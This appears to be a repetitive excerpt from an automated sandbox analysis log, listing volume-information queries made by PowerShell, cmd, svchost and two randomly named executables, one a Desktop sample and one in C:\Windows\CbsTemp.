Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\cmd.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation |
|
Source: C:\Windows\System32\svchost.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation |
|